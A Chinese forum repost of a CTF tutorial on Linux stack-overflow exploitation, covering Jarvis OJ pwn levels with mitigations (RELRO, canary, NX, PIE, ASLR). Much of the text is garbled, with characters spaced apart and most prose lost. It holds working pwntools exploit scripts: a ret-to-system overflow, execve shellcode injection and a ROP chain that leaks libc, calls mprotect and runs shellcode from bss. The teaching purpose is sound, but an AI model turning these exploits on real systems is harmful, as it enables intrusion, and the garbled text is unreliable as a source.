设为首页收藏本站
切换到窄版

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
Nmaps Club»论坛 Pentests Wiki Wiki 系统 [28314] 2020-05-24_pwn的艺术浅谈(一):linux栈溢出 ...
返回列表 发新帖
查看: 2|回复: 0

[28314] 2020-05-24_pwn的艺术浅谈(一):linux栈溢出

[复制链接]
s7ckTeam

6万

主题

-6万

回帖

-58

积分

管理员

积分
-58
发表于 4 天前 | 显示全部楼层 |阅读模式
2020-05-24_pwn的艺术浅谈(一):linux栈溢出 p w n l i n u x   O t s   2 0 2 0 - 0 5 - 2 4 l i n u x   p w n j a r v i s o j p w n l i n u x h t t p s : / / w w w . j a r v i s o j . c o m / c h a l l e n g e s 0 .   L e v e l 0 n x N X 6 4 l i n u x l i n u x   p w n 0 . R E L R O R E L R O ( l d   - z   r e l r o ) : . g o t ( . g o t . p l t ) . R E L R O ( l d   - z   r e l r o   - z   n o w ) R E L R O . ( ) ,   . g o t . . g o t . p l t . g o t ,   . g o t . p l t . 1 . s t a c k   c a n a r y / x 0 0 c a n a r y 2 . N X n o   e x e c u t a b l e 3 . p i e e l f a s l r L i n u x a s l r s u d o   b a s h   - c   " e c h o   0   >   / p r o c / s y s / k e r n e l / r a n d o m i z e _ v a _ s p a c e " 0   A S L R 1 m m a p ( )     V D S O   2   1     b r k ( )   l e v e l 0 I D A
使 I D A F 5 I D A 使 m a i n w r i t e ( 1 , H e l l o ,   W o r l d n , 0 x d ) H e l l o , W o r l d n L i n u x f d 0 1 2 f d 3 w r i t e ( e a x ) v u l n e r a b l e _ f u n c t i o n v u l n e r a b l e _ f u n c t i o n v u l n e r a b l e _ f u n c t i o n r e a d ( 0 , b u f , 0 × 2 0 0 ) b u f r b p - 0 × 8 0 f d = 0 0 × 2 0 0 0 . i n l i n e   h o o k p u s h   b p ( ) m o v   b p , s p ( b p s p ) s u b   s p , x x ( x x )
1 .   2 . c a l l f u n c c a l l p u s h p c j u m p f u n c f u n c 1 - 3
c a l l   f u n c : 1 .   l e a v e m o v   s p , b p p o p   b p m o v   s p , b p s p m o v   b p , s p 使 b p s p s p b p p o p   b p b p s p p c 2 .   r e t n p o p   i p s p p c p o p   i p p c i p c a l l e r s   p c c a l l e r s   p c p c l e v e l 0 p a y l o a d p a d d i n g + b p + p c p a d d i n g 0 × 8 0 n x n o   e x e c u t e p c s h e l l c o d e n x c a l l s y s t e m s y s t e m ( / b i n / s h ) p c c a l l s y s t e m 4 0 0 5 9 6
f r o m   p w n   i m p o r t   * c o n t e x t . l o g _ l e v e l = ' D E B U G ' r m t = 1 i f   r m t :   r = r e m o t e ( ' p w n 2 . j a r v i s o j . c o m ' , 9 8 8 1 ) e l s e :   r = p r o c e s s ( ' . / l e v e l 0 ' ) s y s _ a d d r = 0 x 4 0 0 5 9 6 p a y l o a d = ' a ' * 0 x 8 0 + ' b ' * 8 + p 6 4 ( s y s _ a d d r ) r . s e n d l i n e a f t e r ( ' H e l l o ,   W o r l d ' , p a y l o a d ) r . i n t e r a c t i v e ( ) 1 .   l e v e l 1 n x s h e l l c o d e l e v e l 0 l e v e l 1 3 2 n x l e v e l 0 ( s y s t e m ( / b i n / s h ) ) s h e l l c o d e b u f b u f s h e l l c o d e b u f s h e l l c o d e p a y l o a d = s h e l l c o d e + p a d d i n g + b p + r e t s h e l l c o d e + p a d d i n g 0 × 8 8 3 2 b p 4 r e t b u f s h e l l c o d e 使 p w n t o o l s s h e l l c r a f t s y s t e m ( / b i n / s h ) l i n u x h t t p s : / / s y s c a l l s . k e r n e l g r o k . c o m / 0 x b s y s _ e x e c v e e a x = 0 x b e b x = p a t h e c x = a r g v e n v p = 0 s y s _ e x e c v e ( p a t h , a r g v , e n v p )
f r o m   p w n   i m p o r t   * c o n t e x t . l o g _ l e v e l = ' D E B U G ' r m t = 1 i f   r m t :         r = r e m o t e ( ' p w n 2 . j a r v i s o j . c o m ' , 9 8 7 7 ) e l s e :         r = p r o c e s s ( ' . / l e v e l 1 ' ) r . r e c v u n t i l ( ' t h i s : ' ) b u f _ a d d r = i n t ( r . r e c v u n t i l ( ' ? ' , d r o p = T r u e ) , 1 6 ) p a y l o a d   =   a s m ( s h e l l c r a f t . s h ( ) ) . l j u s t ( 0 x 8 8 , x 9 0 ) p a y l o a d + = b ' * 4   +   p 3 2 ( b u f _ a d d r )   r . s e n d ( p a y l o a d ) r . i n t e r a c t i v e ( ) p w n t o o l s s h e l l c o d e / *   e x e c v e ( p a t h = ' / b i n / / / s h ' ,   a r g v = [ ' s h ' ] ,   e n v p = 0 )   * /     / *   p u s h   ' / b i n / / / s h x 0 0 '   * /     p u s h   0 x 6 8     p u s h   0 x 7 3 2 f 2 f 2 f     p u s h   0 x 6 e 6 9 6 2 2 f     m o v   e b x ,   e s p     / *   p u s h   a r g u m e n t   a r r a y   [ ' s h x 0 0 ' ]   * /     / *   p u s h   ' s h x 0 0 x 0 0 '   * /     p u s h   0 x 1 0 1 0 1 0 1     x o r   d w o r d   p t r   [ e s p ] ,   0 x 1 0 1 6 9 7 2     x o r   e c x ,   e c x     p u s h   e c x   / *   n u l l   t e r m i n a t e   * /     p u s h   4     p o p   e c x     a d d   e c x ,   e s p     p u s h   e c x   / *   ' s h x 0 0 '   * /     m o v   e c x ,   e s p     x o r   e d x ,   e d x     / *   c a l l   e x e c v e ( )   * /     p u s h   S Y S _ e x e c v e   / *   0 x b   * /     p o p   e a x     i n t   0 x 8 0
2 .   l e v e l 5 r o p a s l r n x s h e l l c o d e l e v e l 2 l e v e l 3 l e v e l 4 r o p p w n l e v e l 5 l e v e l 3 l e v e l 5 r o p r o p R e t u r n - o r i e n t e d P r o g r a m m i n g g a d g e t r o p ; p L e v e l 5 使 m m a p 使 m p r o t e c t 1 .   l i b c a s l r m m a p m p r o t e c t 2 .   p i e 便 s h e l l c o d e b s s s h e l l c o d e b s s 3 .   n x b s s m p r o t e c t b s s 3 . b s s s h e l l c o d e 1 )   l i b c a s l r p i e a s l r l i b c p i e l i b c l i b c w r i t e ( 1 , w r i t e @ g o t ) 便
L i n u x 使 r d i = 1 , r s i = w r i t e @ g o t w r i t e @ p l t g o t p l t l i n u x p l t p r o c e d u r e   l i n k a g e   t a b l e ,   g o t g o t g o t g o t g l o b a l   o f f s e t   t a b l e g o t p l t p l t 使 R O P g a d g e t r d i g a d g e t 0 x 4 0 0 6 b 3 l i b c l i b c w r i t e @ g o t w r i t e l i b c l i b c 2 s h e l l c o d e b s s r e a d ( 0 , b s s _ a d d r , s i z e o f ( s h e l l c o d e ) ) 便 r o p s h e l l c o d e b s s r o p s h e l l c o d e 3 b s s m p r o t e c t ( b s s _ a d d r , 0 × 1 0 0 0 , 7 )
m p r o t e x t p r o t 7 p r o t | 使 1 . P R O T _ R E A D 2 . P R O T _ W R I T E 3 . P R O T _ E X E C 4 . P R O T _ N O N E 访 4 b s s s h e l l c o d e f r o m   p w n   i m p o r t   * c o n t e x t . l o g _ l e v e l = ' D E B U G ' l o c a l = 1 i f   l o c a l :         r = p r o c e s s ( ' . / l e v e l 3 _ x 6 4 ' ) e l s e :         r = r e m o t e ( ' p w n 2 . j a r v i s o j . c o m ' , 9 8 8 3 ) f i l e = E L F ( ' . / l e v e l 3 _ x 6 4 ' ) l i b c = E L F ( ' . / l i b c - 2 . 1 9 . s o ' )   d e f   d e b u g ( ) :         i f   l o c a l :               p r i n t   ' p i d :   ' + s t r ( r . p i d )               p a u s e ( ) p r d i = 0 x 4 0 0 6 b 3 p r s i = 0 x 4 0 0 6 b 1 b s s _ s t a r t = 0 x 6 0 0 A 8 8 s t a r t _ a d d r = 0 x 4 0 0 4 F 0 ' ' '     0 x 0 0 0 0 0 0 0 0 0 0 4 0 0 6 b 1   :   p o p   r s i   ;   p o p   r 1 5   ;   r e t     0 x 0 0 0 0 0 0 0 0 0 0 0 0 1 b 8 e   :   p o p   r d x   ;   r e t ' ' ' p a y l o a d 1 = ' a ' * 0 x 8 0 + ' b ' * 8 + p 6 4 ( p r d i ) + p 6 4 ( 1 ) + p 6 4 ( p r s i ) + p 6 4 ( f i l e . g o t [ ' w r i t e ' ] ) + ' c ' * 8 + p 6 4 ( f i l e . p l t [ ' w r i t e ' ] ) p a y l o a d 1 + = p 6 4 ( s t a r t _ a d d r ) r . r e c v u n t i l ( ' n ' ) r . s e n d ( p a y l o a d 1 ) w r i t e _ g o t = u 6 4 ( r . r e c v ( 8 ) ) s l e e p ( 1 ) l i b c _ b a s e = w r i t e _ g o t - l i b c . s y m [ ' w r i t e ' ]
m p r o t e c t = l i b c _ b a s e + l i b c . s y m [ ' m p r o t e c t ' ] p r d x = l i b c _ b a s e + 0 x 1 b 8 e p r i n t   h e x ( l i b c _ b a s e ) p r i n t   h e x ( m p r o t e c t ) p r i n t   h e x ( p r d x ) p a y l o a d 2 = ' a ' * 0 x 8 0 + ' b ' * 8 + p 6 4 ( p r d i ) + p 6 4 ( 0 x 6 0 0 0 0 0 ) + p 6 4 ( p r s i ) + p 6 4 ( 0 x 1 0 0 0 ) + ' c ' * 8 + p 6 4 ( p r d x ) + p 6 4 ( 7 ) + p 6 4 ( m p r o t e c t ) + p 6 4 ( s t a r t _ a d d r ) r . r e c v u n t i l ( ' n ' ) r . s e n d ( p a y l o a d 2 ) s l e e p ( 1 ) d e b u g ( ) p a y l o a d 3 = ' a ' * 0 x 8 0 + ' b ' * 8 + p 6 4 ( p r d i ) + p 6 4 ( 0 ) + p 6 4 ( p r s i ) + p 6 4 ( b s s _ s t a r t ) + ' c ' * 8 + p 6 4 ( p r d x ) + p 6 4 ( 4 8 ) + p 6 4 ( f i l e . p l t [ ' r e a d ' ] ) + p 6 4 ( s t a r t _ a d d r ) r . r e c v u n t i l ( ' n ' ) r . s e n d ( p a y l o a d 3 ) s l e e p ( 1 ) r . s e n d ( a s m ( s h e l l c r a f t . a m d 6 4 . l i n u x . s h ( ) , a r c h = ' a m d 6 4 ' ) ) d e b u g ( ) p a y l o a d 4 = ' a ' * 0 x 8 0 + ' b ' * 8 + p 6 4 ( b s s _ s t a r t ) r . r e c v u n t i l ( ' n ' ) r . s e n d ( p a y l o a d 4 ) r . i n t e r a c t i v e ( ) p w n
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver|手机版|小黑屋|Nmaps Club

GMT+8, 2025-1-23 07:06 , Processed in 0.468421 second(s), 30 queries .

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表